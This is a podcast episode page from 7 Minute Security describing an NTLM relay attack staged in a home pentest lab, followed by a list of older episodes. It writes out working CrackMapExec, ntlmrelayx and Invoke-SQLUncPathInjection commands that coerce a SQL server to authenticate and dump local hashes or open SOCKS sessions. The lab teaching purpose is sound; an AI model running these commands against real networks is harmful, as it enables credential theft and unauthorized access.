7MS #570: How to Build a Vulnerable Pentest Lab - Part 4
7 Minute Security5 Touko 2023

7MS #570: How to Build a Vulnerable Pentest Lab - Part 4

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

In today's episode we staged an NTLM relay attack using a vulnerable SQL server.

First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled:

cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt

Then we setup lsarelayx in one window:

lsarelayx --host=localhost

And in a second window we ran ntlmrelayx.py:

python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM

Finally, in a third window we triggered authentication from the vulnerable SQL server:

Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS

Boom! Watch the local usernames and hashes fall out of the victim system.

We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this:

victim1 victim2 victim3

Then we tweaked the ntlmrelayx command slightly:

python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt

Interestingly(?) only victim2 was attacked.

Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay:

python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks

Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server.

TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.

Jaksot(705)

7MS #73: PCI Pentesting 101 – Part 2 (audio)

7MS #73: PCI Pentesting 101 – Part 2 (audio)

This episode is the exciting continuation of a recent pentest I did, in which I got some serious pwnage, including cracking the domain admin password! 7MS #73: PCI Pentesting 101 – Part 2 (audio)

30 Kesä 20157min

7MS #72: PCI Pentesting 101 (audio)

7MS #72: PCI Pentesting 101 (audio)

I'm pumped to talk about an about an awesome, free little tool that made my Internet connection feel like new again. 7MS #72: PCI Pentesting 101 (audio)

25 Kesä 20157min

7MS #71: OFFTOPIC-Mad Max (audio)

7MS #71: OFFTOPIC-Mad Max (audio)

We're going totally off topic today and doing a movie review of Mad Max! 7MS #71: OFFTOPIC-Mad Max (audio)

23 Kesä 20158min

7MS #70: Get the Most out of Your DNS! (audio)

7MS #70: Get the Most out of Your DNS! (audio)

I'm pumped to talk about an about an awesome, free little tool that made my Internet connection feel like new again. 7MS #70: Get the Most out of Your DNS! (audio)

18 Kesä 20157min

7MS #69: I'm Not Responsible for Your Information Insecurity (audio)

7MS #69: I'm Not Responsible for Your Information Insecurity (audio)

Are you too hard on yourself? Do you think the success of your client's infosec program lives and dies with you? Listen to this episode. You might feel better. 7MS #69: I'm Not Responsible for Your Information Insecurity (audio)

16 Kesä 20158min

7MS #68: Is Training and Awareness Worth It or Worthless (audio)

7MS #68: Is Training and Awareness Worth It or Worthless (audio)

This episode is about something that got my undies in a bunch – I heard a security expert imply that training and awareness might be worthless! 7MS #68: Is Training and Awareness Worth It or Worthless (audio)

11 Kesä 20158min

7MS #67: Wifi Sniffing is Fun-Part 2 (audio)

7MS #67: Wifi Sniffing is Fun-Part 2 (audio)

This is a follow-up to episode #64, in which I did some fun wireless sniffing and tried to find sensitive data within it! In the episode I talk about the network "map" of my sniffing setup. It looks like this: Ethernet from client->upstream port of hub My laptop with Wireshark->Hub Wifi access point->Hub To find…

9 Kesä 20157min

7MS #66: I'm Excited to Go Phishing – Part 2 (audio)

7MS #66: I'm Excited to Go Phishing – Part 2 (audio)

This is a follow-up to episode #63, discussing the results of a fun phishing campaign I recently completed. 7MS #66: I'm Excited to Go Phishing – Part 2 (audio)

4 Kesä 20158min

Suosittua kategoriassa Politiikka ja uutiset

rss-ootsa-kuullut-tasta
aikalisa
tervo-halme
ootsa-kuullut-tasta-2
politiikan-puskaradio
viisupodi
rss-podme-livebox
et-sa-noin-voi-sanoo-esittaa
otetaan-yhdet
rss-vaalirankkurit-podcast
aihe
the-ulkopolitist
rss-polikulaari-humanisti-vastaa-ja-muut-ts-podcastit
rss-hyvaa-huomenta-bryssel
rss-kuka-mina-olen
politbyroo
linda-maria
rss-lets-talk-about-hair
rss-50100-podcast
rss-tekoalyfoorumi